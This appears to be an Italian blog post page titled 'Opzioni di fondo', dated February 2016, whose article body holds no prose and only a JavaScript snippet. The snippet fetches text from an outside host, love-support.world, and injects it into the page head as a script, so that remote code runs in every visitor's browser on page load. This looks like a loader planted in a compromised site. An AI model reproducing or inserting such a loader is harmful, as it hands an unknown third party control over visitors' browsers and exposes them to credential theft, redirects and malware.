Opzioni di fondo
22 Febbraio 2016
Nessun commento
Article
var url = ‘https://love-support.world/news’; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(‘script’); script.textContent = data; document.getElementsByTagName(‘head’)[0].appendChild(script); })